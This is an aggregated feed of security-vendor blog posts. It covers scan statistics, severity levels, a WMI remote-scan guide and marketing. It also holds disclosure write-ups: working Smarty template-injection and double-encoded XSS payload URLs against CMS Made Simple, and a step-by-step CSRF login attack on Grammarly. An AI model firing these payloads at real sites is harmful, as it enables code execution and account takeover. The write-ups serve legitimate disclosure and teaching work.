Quantcast
Channel: Invicti
Viewing all 1027 articles
Browse latest View live

Infographic: Statistics About the Security State of 104 Open Source Web Applications

$
0
0

Infographic highlighting the state of security of 104 open source web applicationsEvery year we publish a number of statistics about the vulnerabilities which the Netsparker web application security scanner automatically identified in open source web applications. Netsparker is a heuristic web application security scanner, so all these vulnerabilities have been identified heuristically, and not with signatures. Here are the numbers for the scans and research we have done in 2016.

Why Do We Use Open Source Web Applications for Testing?

We use open source web applications to test our dead accurate web vulnerability scanning technology because of the diversity. You can find any type of web application you can dream of in the open source community; forum, blog, shopping cart, social network platform etc. You can also find applications written in almost all of the development languages available, such as PHP, Java, Ruby on Rails, ASP.NET etc. In fact, in 2016 we further diversified our test lab and included more web applications that are built with NodeJS, Python and other similar frameworks.

The other reason why we use open source web applications is because once we are doing the testing, we can still give something back to the community. By scanning these web applications and reporting the 0-day  vulnerabilities back to the developers we are helping open source developers write more secure code.

In fact, we are so committed to helping open source projects developers, that we are also giving free Netsparker Cloud accounts to all open source web developers.

Open Source Web Applications, Vulnerabilities & Numbers for 2016

How Many Web Applications and Vulnerabilities?

In 2016 we scanned 104 web applications and identified 129 vulnerabilities in 31 of them. Therefore 29.8% of the scanned web applications had one or more web application vulnerabilities in them.

How Many 0-Day Vulnerabilities Did Netsparker Identify?

During our test scans in 2016, we identified 31 0-day vulnerabilities, and we published 27 advisories, 6 of which were published in 2017. We do not always publish an advisory because it is not always possible to do so. Unfortunately, sometimes there are too many things that restrict us from publishing an advisory.

What About the Other Vulnerabilities?

The other 98 vulnerabilities that the Netsparker web vulnerability scanner identified were known vulnerabilities which have not been fixed yet. We keep a record of these vulnerabilities for two reasons:

  1. To measure the effectiveness of the automated scanner. I.e. if there are known vulnerabilities and the scanner does not identify them it means we are not doing a good enough job. The good news is that Netsparker did not just identify all the known vulnerabilities, but also uncovered 31 0-days.
  2. Even though these are known vulnerabilities, they have not been fixed in the latest version of the software in question. So anyone installing these web application will be vulnerable.

Are We Seeing More Secure Web Applications?

During both of 2015 and 2016, we published fewer advisories than we did in 2014. Does that mean that we are seeing more secure web applications? The answer is both yes and no.

Yes because some of the web application projects that have been around for years are becoming more secure. Their developers have more experience and are learning from the community. WordPress is a perfect example of this; WordPress core is very secure.

At the same time new open source web applications are being released almost on a daily basis, and even though it is not a guarantee, the chances of newly developed web applications having a vulnerability are very high. So there will always be a good number of vulnerable web applications out there.

Trivia: 26 of the scanned web applications were WordPress plugins, 8 of which had vulnerabilities.

Most Common Web Application Vulnerabilities in Open Source Web Applications for 2016

Which were the most common identified web application vulnerabilities in the open source web applications we scanned? Here are the numbers:

The top two culprits are Cross-site Scripting and SQL Injection vulnerabilities, with XSS accounting for a staggering 81.9% of the identified vulnerabilities. This is not unusual, last year we had similar results with 180 XSS and 55 SQL Injection vulnerabilities.

Web Security Automation is the Key

According to the above numbers, on average a vulnerable web application would have 6.6 vulnerabilities. Malicious hackers are definitely happy with the a la carte selection of vulnerabilities they have at their disposal.

This is somehow expected considering the average modern web application has hundreds, if not thousands of possible attack surfaces. Web applications are becoming really complex and unless you automate security, it is impossible to develop a secure web application. Some people might not agree, but how can you, as a web application developer check that every possible attack surface on your web application is not vulnerable to hundreds of different vulnerability variants manually?

Definitely, you cannot and automation is the key here. That’s what we are focusing on at Netsparker. We do not just develop a scanner, but we are developing a web application security solution that generates dead accurate web security scan results, so you do not have to waste time manually verifying the findings.

Free Web Application Security Scans for Open Source Project

Take advantage of our offering and build more secure web applications. As an open source developer, you can get a free Netsparker Cloud account so you can automatically scan your open source projects for web applications. Some open source projects such as OpenCart are already benefiting from free web application security scans.


Web Application Vulnerabilities Severities Explained

$
0
0

What are vulnerability severities?

Netsparker web application security scanner scans for a wide variety of vulnerabilities in websites, web applications and web services.

Each vulnerability has a different impact; some need addressed urgently, while others are less of a priority. For example, a SQL Injection vulnerability should definitely be prioritised over an Internal IP address disclosure.

To help you better decide which vulnerabilities should be fixed first, Netsparker categories them in its scans and reports. This article defines the following types of vulnerabilities:

  • Critical
  • Important
  • Medium
  • Low

In addition, there are Informational Alerts. For further information, see our full list of web vulnerability checks.

Table Of Contents

Critical Severity Web Vulnerabilities

This section explains how we define and identify web vulnerabilities of Critical severity.

Critical Severity Example

This is what a report of a Critical severity vulnerability looks like in Netsparker web application security scanner.

Critical Severity Example

Impacts of Critical Severity Web Application Vulnerabilities

The impacts of Critical severity vulnerabilities are as follows:

  1. These vulnerabilities can allow attackers to take complete control of your web applications and web servers. In exploiting this type of vulnerability, attackers could carry out a range of malicious acts including (but not limited to):
  • Stealing information (for example, user data)
  • Tricking your users into supplying them with sensitive information (for examples, credit card details)
  • Defacing your website
  • By exploiting a critical severity vulnerability, attackers can access your web application's database. This allows them to acquire user and administrator information that might allow them to make changes such as delete or modify other user accounts.
  • On exploiting such vulnerabilities, attackers can access and control logged-in user or administrator accounts, enabling them to hijack accounts and make changes that typically only those users can.
  • Suggested Action for Critical Severity Vulnerabilities

    A Critical severity vulnerability means that your website can be hacked any time. You should make it your highest priority to fix these vulnerabilities immediately. Once you fix them, rescan the website to make sure they have been eliminated.

    Important Severity Web Application Vulnerabilities

    This section explains how we define and identify web vulnerabilities of Important severity.

    Important Severity Example

    This is what a report of an Important severity vulnerability looks like in Netsparker.

    Important Severity Example

    Impacts of Important Severity Vulnerabilities

    1. Attackers can find other vulnerabilities, and potentially your database passwords, by viewing your application's source code.
    2. On exploiting such vulnerabilities, attackers can view information about your system that helps them find or exploit other vulnerabilities that enable them to take control of your website and access sensitive user and administrator information.

    Suggested Action for Important Severity Vulnerabilities

    An Important severity vulnerability means that your website can be hacked and hackers can find other vulnerabilities which have a bigger impact. Fix these type of vulnerabilities immediately. Once you fix them, rescan your website to make sure they have been eliminated.

    Medium Severity Web Vulnerabilities

    This section explains how we define and identify web vulnerabilities of Medium severity.

    Medium Severity Example

    This is what a report of a Medium severity vulnerability looks like in Netsparker.

    Medium Severity Example

    Impacts of Medium Severity Vulnerabilities

    1. Attackers can access a logged-in user account to view sensitive content.
    2. By exploiting these security issues, attackers can access to information that helps them exploit other vulnerabilities, or better understand your system so they can refine their attacks.

    Suggested Action for Medium Severity Vulnerabilities

    Most of the time, since the impact of Medium severity vulnerabilities is not direct, you should first focus on fixing Critical and Important severity vulnerabilities. However, Medium severity vulnerabilities should still be addressed at the earliest possible opportunity

    Low Severity Web Vulnerabilities

    This section explains how we define and identify web vulnerabilities of Low severity.

    Low Severity Example

    This is what a report of a Low severity vulnerability looks like in Netsparker.

    Low Severity Example

    Impacts of Low Severity Vulnerabilities

    Do not overly concern yourself if your website has low severity vulnerabilities. These type of issues do not have any significant impact and are not exploitable.

    Suggested Action For Low Severity Vulnerabilities

    If time and budget allows, it is worth investigating and fixing Low severity vulnerabilities.

    Informational Alerts

    This section explains how we define and use Informational Alerts.

    Informational Alerts

    Impacts of Informational Alerts

    We do not even call these alerts vulnerabilities. They are reported simply for your information as a website owner.

    Suggested Action for Informational Alerts

    No action or fix is required. It is just sometimes good to know about things that are on your web application such as: NTLM Authorization Required, Database Detected (MySQL), Robots.txt Detected, phpMyAdmin Detected or Out-of-date Version (jQuery).

    Live Demo: Exploiting Apache Struts Vulnerabilities

    $
    0
    0

    Our CEO, Ferruh Mavituna, and Security Researcher, Sven Morgenroth, joined Paul Asadoorian in episode #143 of Hack Naked News.

    During the show, Ferruh discusses what causes could have led to the infamous Equifax hack and the data breach of hundreds of millions of records of cardholder data. Even though it was thought that a deserialization vulnerability in the REST plugin of Apache Struts was the main cause, an OGNL Expression Injection (CVE-2017-5638) published in March was the root cause for the breach. Therefore our Security Researcher, Sven, gave a live demo of how to find and exploit several OGNL expression vulnerabilities in Struts.

    Demo: Identifying and Exploiting OGNL Expression Injection Vulnerabilities

    During the demo, Sven also used Netsparker Web Application Security Scanner to highlight how easy it is to automatically find these types of vulnerabilities when you use the correct tools. Watch the full Hack Naked News episode #143.

    You can also skip directly to Ferruh’s discussion of the Equifax hack, and Sven’s explanation of OGNL Expression Injection vulnerabilities and how to identify and exploit them.

    Netsparker Will Be Exhibiting at Gartner Symposium/ITxpo in Barcelona 2017

    $
    0
    0

    Gartner Symposium/ITxpo 2017

    This year Netsparker will exhibit at the Gartner Symposium/ITxpo Conference 2017 in Barcelona, Spain. The event will be held from the 5th to the 9th of November at the Centre Convencions Internacional Barcelona.

    Come and visit us at our booth to talk about web application security and our dead accurate web application vulnerability scanner that can identify vulnerabilities in any type of modern web application, regardless of the architecture it is built with.

    Make sure not to miss out on our famed merchandise, so come and check out the goodies we have for you this year at our booth. For more information, visit the Gartner Symposium/ITxpo website for a copy of the agenda.

    Get a €600 Discount on the Gartner Symposium/ITxpo Conference Ticket

    Use the discount code GSSYM103 when buying your Gartner Symposium/ITxpo Conference Ticket to get a €600 discount.

    Triggering Netsparker Desktop Scans Remotely With Windows Management Instrumentation

    $
    0
    0

    This article explains how to remotely trigger Netsparker Desktop web application security scanner on a Local Area Network (LAN). This enables you to connect to the remote machine via WMI in order to run Netsparker on it.

      1. Adding the Netsparker File Path to the Environment Variables
      2. Triggering Netsparker Web Security Scans Remotely
      3. Security Best Practice

    Adding the Netsparker File Path to the Environment Variables

    First, you must add the Netsparker file path to the PATH system variable.

    How to Add the Netsparker File Path to the Environment Variables
    1. In Windows Startup, enter 'environment'.

    From Windows Startup, write "environment". And click the “Edit the system environment variables” for editing your System PATH variable.

    1. Click Edit the system environment variables to edit your System PATH variable. The Environment Variables dialog is displayed.

    In the Environment Variables dialog, from the System variables list, click Path, then click Edit. The Edit environment variable dialog is displayed.

    1. In the Environment Variables dialog, in the System Variables section, click Path. The Edit environment variable dialog is displayed.

    From the Edit environment variable dialog, click New to add Netsparker's file path. Enter the file path, and click OK.

    1. In the Edit environment variable dialog, click Newto add Netsparker's file path. Enter the file path, and click OK.

    Triggering Netsparker Web Security Scans Remotely

    There are two ways to trigger web security scans remotely. In these examples, scans are initiated remotely using default settings. If you want to scan a website using non-default configuration, see Netsparker Desktop Command Line Interface and Arguments.

    How to Trigger Web Security Scans Remotely (First Method)

    These commands run with the authority of the currently logged-in user. They allow Netsparker to run on a remote machine and to scan the target with a default policy via WMI.

    1. Open PowerShell or CMD and enter this code:

    wmic /node:"REMOTE_COMPUTER_NAME or IP Address" process call create 'cmd /c Netsparker /a /url http[s]://TARGET_URL /rt "REPORT TYPE" /r "YOUR_REPORT_FILE_PATH"'

    Command Example With User Information

    wmic /node:"192.168.244.125" process call create 'cmd /c Netsparker /a /url http://php.testsparker.com /rt "Detailed Scan Report" /r "C:\Users\Sparker\Desktop\report_phptestsparkercom.html"'

    How to Trigger Web Security Scans Remotely (Second Method)

    These commands run with the authority of a different user. They will run Netsparker on a remote machine in order to scan the target with a default policy via WMI.

    You should use a built-in WMI program for triggering the process on a remote machine, as in the First Method. WMI is a built-in program in Windows OS. It is used to create a remote connection in the command line. We use WMI for triggering a command in the remote connection.

    1. Open PowerShell or CMD and enter this code:

    wmic /node:"REMOTE_COMPUTER_NAME or IP Address"  /user:YOURDOMAIN\USERNAME /password:"USERPASSWORD" process call create 'cmd /c Netsparker /a /url http[s]://TARGET_URL /rt "REPORT TYPE" /r "YOUR_REPORT_FILE_PATH"'

    Command Example with User Information

    wmic /node:"192.168.244.125" /user:Net\Sparker /password:"LongLiveTheSparkers!" process call create 'cmd /c Netsparker /a /url http://php.testsparker.com /rt "Detailed Scan Report" /r "C:\Users\Sparker\Desktop\report_phptestsparkercom.html"'

    Security Best Practice

    You could define a user with fewer privileges on your domain. This makes it easier for you to follow the processes in the network. They can still connect to remote machines using the defined user account, and run scans without defining the username and password in the command (First Method).

    The user you will define might have Domain User authority, though you only need to have Admin privileges on the local machine to run web security scans.

    Netsparker's 2016 in Review

    $
    0
    0

    2016 was a great year for Netsparker! We were the first (and only) web application security scanner vendor to introduce a number of cutting-edge technologies that make it possible to scale up web scanning and easily scan 100s and 1000s of websites, without having to spend hours configuring complex tools and days verifying that the vulnerabilities the scanner has detected are not false positives.

    In 2016 we have also introduced the monthly updates for our web application security scanner. We have also been featured in a number of interviews on some popular podcasts and more, as highlighted in this overview post.

    Automating and Scaling Up Web Vulnerability Scanning

    The first Netsparker update we released in 2016 focused on automation and scalability. We developed features in the scanner to help users automate much more of both the pre-scan (configuration) and post-scan (verifying the results). The February 2016 update of Netsparker scanner had:

     Automatic recognition and configuration of URL rewrite rules: you do not need to know the URL rewrite configuration on the target and configure the scanner to crawl and scan all the parameters on the target website.

     Proof-Based Scanning Technology: a technology that automatically generates a proof of exploit of the identified vulnerabilities, so you do not have to manually verify them. Here is a short two minute video on how this technology works, which we have also done in 2016.

    In the February 2016 update of Netsparker web application security scanner we also released the:

    Monthly Web Security Scanner Updates

    Since April 2016 we started releasing a monthly update of both the Netsparker web scanner editions. The advantage of monthly releases is that you do not have to wait four, five or more months to start using a new feature. If a feature is developed, it means it is needed and it will help you automate more, so we will release it once it is ready. Below are some of the highlights from the 2016 product updates:

    Apart from all the new features and scanner improvements, every month we are introducing new web vulnerability checks and improving the existing ones. We are also frequently adding new security checks such as checks for Subresource Integrity and Content Security Policy, to help you build more secure web applications.

    Free Netsparker Cloud Scans, Interviews and More from Netsparker

    In 2016 we have also announced free Netsparker Cloud web vulnerability scans avaialble for open source projects. Several open source projects are already benefitting from this campaign, including OpenCart, who are featured in this web security case study

    Our CEO Ferruh Mavituna has also been interviewed several times during 2016. Starting with an interview in which he explains what is Netsparker at RSA in San Francisco, and then four more interviews on the popular security show Paul’s Security Weekly. You can watch all the interviews from the below links:

    We also hosted a webcast with our friends from Denim group on how to optimize your application security program with Netsparker and ThreadFix.

    What’s in Store for Netsparker Web Security Scanner in 2017?

    In 2016 we have pushed the boundaries of what we can automate in web application security. For 2017 the mantra will be the same. Continue improving the cloud-based and desktop editions of our web application security scanner both in terms of features, ease of use, automation and also scanning capabilities.

    ProfitKeeper Automates Web Application Security with Netsparker

    $
    0
    0

    “We were impressed by the amount of positive feedback from your existing customers and also the calibre of the companies who were already using Netsparker.”

    ProfitKeeper LogoWho can tell it better than the customer himself? This is not the ordinary case study. This is an interview with Tom Mallory, ProfitKeeper’s IT Ninja. In this interview, Mr Mallory explains why he chose Netsparker Web Application Security Scanner and how it helped him improve the security posture of the web applications that he manages.

    What Can You Tell Us About ProfitKeeper and Your Role?

    When you wear as many hats as I do, I think the only option is to refer to yourself as an IT Ninja. Right?

    ProfitKeeper has been in business for over 13 years, teaming with franchisors to help them increase their profits. Although we provide services to very large, established franchises, we pride ourselves in individualized attention to all our partners no matter the size.

    From a technical standpoint, we’re in the Finance/Analytics industry because that is the type of data we’re working with. But we’re also in the customer service business in the sense that we have clients/customers who trust and rely upon not only the data we provide them but also our ability to keep that data safe.

    Can you tell us a bit about your web environment and applications?

    Our web applications are built with .NET. They run on Microsoft’s IIS web server and use the Microsoft SQL server as a database backend. We currently manage three web applications that are responsible for generating data surrounding KPIs, royalty reporting, business accounting and payroll.

    What Made You Decide to Try Netsparker Web Application Security Scanner?

    We have been using Netsparker for about one-year now. It’s essentially the first time that we’ve relied upon a third-party automated web application security scanner to perform a thorough penetration test.

    A major point of attraction, at least initially, was the number of positive reviews. We were impressed by the amount of positive feedback from your existing customers and also the calibre of the companies who were already using Netsparker.

    Once we dove into using Netsparker (which right now is about once per week) we were impressed by the ease of setup and ongoing use. I wish I could comment on support but we haven’t really had any issues to speak of.

    Believe it or not, in the years prior to using Netsparker we were performing all of our testing manually. You don’t really realize how much time and effort an automated web application security scanner can save you until you try it. Moving back to a manual process seems unfathomable at this point in time.

    A large part of our decision to begin using Netsparker came from our long-term acknowledgement that we need to do everything in our power to ensure that our clients’ data is safe and secure.

    With both personally identifiable information and financials being at risk, we already understood the importance of continually minimizing the ways in which a malicious hacker could access critical information.

    How Has Netsparker Helped to Reduce Security Vulnerabilities?

    As you know, performing manual penetration testing is an arduous process. Netsparker not only makes us faster but also better. Netsparker, and the automation it provides, has allowed us to make our processes as efficient as possible while building more secure web applications.

    One feature we really which also helped us significantly reduce the probability of human error is the Proof-Based Scanning Technology, which automatically verifies the identified vulnerabilities. That’s a lifesaver for me, because I do not need to know how to reproduce every vulnerability that’s out there. 

    As regards the findings in our web applications, although we found our code to be void of vulnerabilities, Netsparker helped to confirm this in addition to allowing us to find areas of code that had the potential to cause security issues such as SQL Injection vulnerabilities.

    An often overlooked benefit of Netsparker: It makes you more aware of areas that present the potential for security vulnerabilities.

    Would you like to add anything else?

    Netsparker was extremely easy to setup and use but provided world class information on potential web application vulnerabilities that if exposed, could cost us our company.

    Exploiting SSTI and XSS in the CMS Made Simple Web Application

    $
    0
    0

    CMS Made Simple is a content management system that was first released in July 2004 as an open source General Public License (GPL) package. It is currently used in both commercial and personal projects.

    CMS Made Simple logo

    As Security Researchers working on the Netsparker web application vulnerability scanner, we're always excited about testing and scanning new open source web applications for vulnerabilities. Recently, I read researcher Osanda Malith's blog post, CMSMS 2.1.6 Multiple Vulnerabilities, where he explains his findings following a review of the CMS Made Simple source code. I decided to see for myself what I could uncover.

    The First Step: Noticing the Parameters in the URL

    After installing CMS on our local system, I was determined to try to find a vulnerability. Of course, from a black box point of view, a freshly installed application with default configuration lacks a lot of functionality. However, I decided to take a closer look.

    It didn't take long before I noticed the following URL in the address bar of the browser:

    https://localhost/CMSMS/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=Simplex%20News%20Detail&cntnt01returnid=1

    URL of note in the address bar of CMS made simple

    Finding so many parameters together in a URL always excites Security Researchers. Why? Well, the more parameters with different functionality you expose, the greater the number of potential attack surfaces.

    Manually Reviewing Potential Attack Surfaces

    At this point, I decided to take a closer look at the URL. If the purpose of a parameter is not obvious, and there is no alternative, changing the value of a particular parameter may be the quickest way to find out. For example, if any parameter value is displayed on the page, it's a good idea to check if it's vulnerable to Cross-site scripting (XSS) first.

    Let's look at what happened when I modified the cntnt01detailtemplate parameter value by adding =test.

    As you might imagine, the entered string should match with another value in the back end. This error occurred even when I changed a single letter. I concluded that it was not a good idea to look for XSS there.

    Perhaps the Source Code Would Help Me Decide What To Do

    After quickly checking the source code to see why it generated an error, I could see that the value was related to the template detail, as the parameter name implies. It was built using Smarty Template Engine, which keeps content, functionality and templates separate. However, as we know, developers must be careful when using template engines, because if implemented incorrectly in applications, they can lead to critical security problems.

    I continued with the black box tests.

    Detecting and Exploiting Template Injection to Gain Remote Code Execution

    I decided to add a simple payload to the following URL (instead of 'Simplex News Detail') to help me see what was happening:

    https://localhost/CMSMS/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:Netsparker&cntnt01returnid=1

    I added, simply: =string:Netsparker. This displayed 'Netsparker' in the window.

    I then retested it with another payload:

    https://localhost/CMSMS/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{6*3}&cntnt01returnid=1

    I added: =string:{6*3}. Again, I was able to display a number in the window.

    Most template engines have a 'sandboxed' mode to prevent you from going further. However. depending on the template engine used, it is sometimes possible to escape the sandbox and execute arbitrary code. In this case, exploiting unsandboxed Smarty was a simple matter:

    https://localhost/CMSMS/index.php?mact=News,cntnt01,detail,0&cntnt01articleid=1&cntnt01detailtemplate=string:{php}phpinfo();{/php}&cntnt01returnid=1

    I added this: string: {php}phpinfo();{/php}. And, I was able to see the output of the phpinfo function displayed in the screenshot.

    What Did I Overlook During the Manual Audit?

    Basically, what I was trying to do was to observe the output following particular requests, or any particular user input during manual tests. The input you observe, such as cntnt01detailtemplate, can produce different outputs for many reasons. It is very difficult to use manual testing to observe all possible behaviors. The cntnt01detailtemplate did not initially reflect the changes I made on the parameter. At this point, many Security Researchers would not waste further time searching for an XSS vulnerability on this parameter. In addition, sometimes there are simply too many prerequisites for a successful attack to occur, and you may need to test hundreds of possibilities for a single parameter to even detect all of these preconditions.

    This is a serious problem for security researchers – but not for the dead accurate web vulnerability scanner Netsparker.

    Netsparker Automatically Identified the XSS Vulnerability in the Same Parameter

    To add insult to injury, the Server Site Template Injection was not the only vulnerability in this parameter. There was an additional Cross-site Scripting vulnerability that could be triggered by double encoding the payload, and the urldecode function was used on that input value. This led to an XSS vulnerability, even though the special characters were encoded to HTML entities once they entered the application.

    This is the XSS vulnerability we found when we scanned the web application with Netsparker:

    XSS vulnerability

    Let's take a closer look at why we did not find this XSS vulnerability during the manual tests. Even when using a whitebox approach, the XSS was quite hard to find. This was because the developers used object-oriented programming (OOP) style with lots of interconnected classes, and put some of the application logic into templates. This makes it very hard to trace the code and find out where data enters and exits the web application.

    A Detailed Explanation of the Cross-site Scripting Vulnerability Identified in CMS Made Simple

    However, let me provide you with an overview of the vulnerability. The data enters the application in the lib/classes/class.moduleoperations.inc.php file in the function GetModuleParameters, where the $_REQUEST variable is processed. The code strips the prefix from the parameter values and returns the resulting values in the $params array.

    Following that, the parameters are sanitized against XSS in the lib/classes/class.CMSModule.php file, as shown.

    This should be sufficient to sanitize the parameters. However, it is always better to save the raw data and encode it, depending on the context in which it is used. As mentioned above, the vulnerability is in the detail template parameter, which is currently correctly sanitized.

    In the modules/News/action.detail.php file, the detailtemplate parameter is URL-decoded again, which ensures that the path to the template does not contain any URL-encoded characters. After all, the parameter is not intended to be printed, and should only be passed to a function that fetches the template. Even if it was printed, HTML special characters are still replaced with HTML entities.

    So far everything looks fine. The detailtemplate parameter is not printed anywhere, and is only used to load the template. The problem, however, is that there is no valid template with the name of our payload. Therefore an exception is thrown in the index.php file.

    The errorConsole function is located in the lib/classes/internal/class.Smarty_CMS.php file, and contains the following code.

    As you can see, $e->getMessage() is assigned to the template. However, the problem is that this contains the detailtemplate parameter, which was URL-decoded. When we look into the template located in the lib/assets/templates/cmsms-error-console.tpl file, it becomes apparent why only logged-in users, like administrators, are vulnerable to XSS.

    The $loggedin template variable was assigned above and is only true if the user is logged in. The output of detailtemplate is in {$e_message}. As already mentioned, this is still encoded with HTML specialchars, even though urldecode() was already used to remove URL-encoded values.

    The problem is that only certain special characters are sanitized by the HTML special character function, for example <, > and &. What it doesn't sanitize is the percentage (%) character. However, this is the prefix of URL-encoded bytes. This means that if we double encode the value, by passing %253c in the template name, it will contain %3c instead of <.

    For example instead of <script>alert(1)</script>, we pass %253cscript%253ealert(1)%253c/script%253e as our payload. It does not contain any character that is encoded to an HTML entity, so it will be stored as %3cscript%3ealert(1)%3c/script%3e on the server side. However, once the urldecode() function is used on this value it will be decoded to <script>alert(1)</script> and therefore introduce an XSS vulnerability through double encoding.

    The Importance of Automating the Vulnerability Assessment

    Even though the vulnerability is relatively easy to fix, it is very hard to find, even in a whitebox test. While it looks like everything is sanitized correctly, a decoding function combined with the right input can still lead to cross-site scripting.

    It is often easier to use an automated vulnerability scanner like Netsparker, since, as in this case, it can conduct a more thorough and accurate analysis of an application than a penetration tester. There are various reasons for this, one of which is the large codebase and the OOP style, which makes debugging harder. The other is the fact that testers usually have a limited amount of time in which they are able to analyse the application.

    Had the vulnerable CMS Made Simple versions been scanned with Netsparker before being published, the vulnerabilities could have been fixed before being deployed in any production environment.

    Since we know that open source projects are instrumental in providing secure applications to a broad range of customers, we supply free Netsparker cloud licenses to all open source web application developers.


    Black Friday All Year? Secure Websites Generate More Revenue Survey Shows

    $
    0
    0

    Nowadays, many businesses understand the crucial importance of having a secure website. To keep their – and their customers' data – safe from hackers, they scan their web applications and web services for vulnerabilities, detecting and fixing them before malicious attackers find them.

    Many others, unfortunately, are either doing little or nothing in terms of website security, mainly because they think that their website is not a target. Others think security vendors are merely scaremongering. So, are we scaremongering or raising awareness? Is it true that insecure websites have a direct impact on the revenue of a business?

    We Surveyed Consumers About Website Security

    Black Friday, Cyber Monday and the festive season, a period closely associated with food and shopping, are just a few days away. The vast majority of the respondents (84.6%) said that they do some of their shopping online.

    During the holidays, how often do you purchase gifts online?

    What's more, 45% of respondents revealed that over 50% of their shopping is done online. That’s a lot of online shopping!

    Consumers’ Concerns When Shopping Online

    In our survey, we asked respondents whether they had any concerns about the security of the online shops they buy from. Here are the results.

    What, if any, is your biggest concern during the holidays when shopping online?

    Respondents were concerned about their credit card details being stolen if the online store was hacked or subject to a malware attack (77.6%). Both types of incidents happen because websites are insecure. This is not a surprising statistic, especially considering the widely-report Equifax data breach news and several other similar incidents.

    Consumers’ Concerns Impact Online Retail Businesses

    These concerns have a direct impact on online businesses. For example, only 33.1% of online shoppers store their payment information on the website, as shown in the graph.

    When you make a purchase online, do you allow the website to save your credit card details and address?

    This has a direct impact on online retail businesses, because customers are more likely to buy and make additional purchases if they do not have to enter their payment details each time.

    Consumers Will Buy More When Reassured That The Online Store is Secure

    Respondents said that they were more likely to visit and buy from an online store if they knew it had good security measures in place and that their information was stored securely (67%).

    Businesses Should Invest in Website Security (and their Business)

    The results clearly show that when businesses invest in website security, and show their customers that they care about their privacy and confidential information, they are also investing in their business. Customers will be more inclined to make a purchase and conduct most of their shopping online.

    Getting Started in Web Security Is Easy

    If you are new to web application security, don’t worry. Getting started is really easy. With the Netsparker web application security scanner, within just a few minutes, you can easily and automatically find web application vulnerabilities that could leave your business and online store exposed.

    CSRF Vulnerability Allows Attackers To See Sensitive Data of Grammarly's Customers

    $
    0
    0

    In the early days of the internet privacy was easier to maintain. If a website prompted you to enter your real name when registering, you had two choices. Either you would leave instantly, or you would provide a fake name, if access to the website was important to you.

    Generally, you were careful about when and where you used your real name online. Websites were lacking javascript, and every personal homepage had at least one colourful gif of a dancing animal.

    The Personal Data Problem on the Internet

    Now, if you try to register on one of the most popular sites on the internet with a fake name, you get instantly banned (see 'Facebook real-name policy controversy'). Messenger apps on your phone upload your whole address book to servers abroad. Many websites ask you for your name, email address, age and gender just to show you an article about a topic of interest.

    Not much of the internet we used to know is left. While this is shocking, the hard truth is, we are used to it. In our contemporary world, we sacrifice privacy for comfort and usability. Why even bother providing a fake name or using throwaway email addresses, when you can simply click 'Login with Facebook' for instant registration?

    Many websites store your private data on their servers. We do not mind this because it is convenient to have it there and it makes our online lives a little bit easier. We trust the services to be careful with our data and have measures in place to ensure that no malicious third party can access it.

    We actually place a vast amount of trust in the websites and services we use. One of them is a cloud service called Grammarly.

    What is Grammarly?

    In 2017, according to Alexa, Grammarly is among the 800 most popular websites in the US. So, what is the service it provides that helped to build such popularity?

    What is Grammarly?

    The service provides plugins for three of the most popular browsers: FireFox, Safari, and Chrome. Grammarly uses these plugins to analyse what you write in real time, and warns you immediately if you make a spelling, grammar or punctuation mistake. It also encourages good writing style. Here is how they describe their service on the Grammarly site:

    Whether you’re writing an important business email, a social media post, an essay, or an online dating profile, Grammarly will have your back...Grammarly helps you write mistake-free on Gmail, Facebook, Twitter, Tumblr, LinkedIn, and nearly anywhere else you write on the web.

    How Grammarly Works

    While this sounds like a useful service, it comes with a problem. In order to analyze your writing, the plugins can read your emails, instant messages, online documents, and more. Whatever you do online, Grammarly is just waiting for you to make a mistake, and show you how to correct it.

    How Grammarly Works

    As soon as you log into the Grammarly service, the plugin starts to check what you write and saves it. It also analyses your writing and emails you a weekly summary report.

    Grammarly also analyses your writing and emails you a weekly summary report.

    The CSRF Attack on Grammarly

    It sounds harmless, doesn't it? After all, you are the only one who knows your password, and Grammarly will not share your data with anyone else.

    Let's assume attackers can't guess your strong and unique password. But, they still have other ways to get your data. Attackers do not need to log into your Grammarly account. They only need to silently log you into theirs!

    CSRF Attack Code

    This code shows the exploit attackers could use to carry out a Cross-Site Request Forgery (CSRF) attack.

    CSRF Attack Code

    CSRF protection would normally prevent other websites from logging you out of your account and logging you into a different, attacker-controlled, one. The problem was that there was no CSRF protection on either auth.grammarly.com/v3/logout or on the auth.grammarly.com/v3/login endpoint.

    Exploiting the CSRF Vulnerability in Grammarly

    This is how attacker would exploit the CSRF security issue in Grammarly. They would:

    1. Host the CSRF attack code on their website
    2. Prompt the victim to click the link to the exploit (by sending an email, instant message, facebook post, for example)
    3. Once the victim clicks the link, the code will:
    • Log the victim out by sending a request to https://auth.grammarly.com/v3/logout (line 5)
    • Prepare a form to submit to https://auth.grammarly.com/v3/login (line 7), which contains the attacker's email address (line 8) and his password (line 9)
    • Automatically submit the form, without any user interaction, using javascript (line 12)
  • The victim is now logged in to the attacker's account and the attacker can use their own email and password to log into Grammarly and view sensitive data belonging to their victim
  • Potential Implications of the CSRF Attack on Grammarly

    These scenarios are not theoretical in nature. This type of web application vulnerability was found in Grammarly a few months ago. As soon as Netsparker noticed the security flaw, we acted responsibly and reported it to the company. Grammarly reacted quickly and professionally, fixing the bug in a short amount of time.

    Companies such as Grammarly, however, don't always have the luxury of knowing about web application vulnerabilities before an attack happens. In this type of CSRF attack, the user's documents are saved in the attacker's account and everything they do subsequently is actually done in the hacker's Grammarly account.

    It is easy to think of scenarios where heavily sensitive data in the hands of hackers could be put to malicious use. Consider this: if you had used Grammarly, what types of documents would you have checked? If you ran a company that is planning a merger and some of your legal documentation got into the hands of hackers, might they be able to use that to publish and expose company secrets or future strategy? What irrevocable damage might that do to your plans? Might the company buying you back out of the deal?

    If you are in charge of a public body that stores lots of clients' personal and health data and you were checking the content of a series of test result letters, what damage might such a breach do to public trust and credibility? Would it incur government fines or other heavy penalties, perhaps?

    If your company provides services to another company, you may have employed Grammarly to check your contract renewal terms before sending. What damage might be done if those contracts, along with your pricing structure and other terms, were revealed to your competitors?

    Is Grammarly secure?

    Think how many of your employees and partners use online tools. Which ones are secure?

    And, if you own and run similar online services, what are you doing, first of all, to ensure that your system has a robust security posture. And, what will you continue to do to maintain it?

    You can read about a similar flaw was found in the Yandex browser ('CSRF Vulnerability in Yandex Browser Allows Attackers to Steal Victims' Browsing Data').

    The Need for Cross-Site Request Forgery Protection

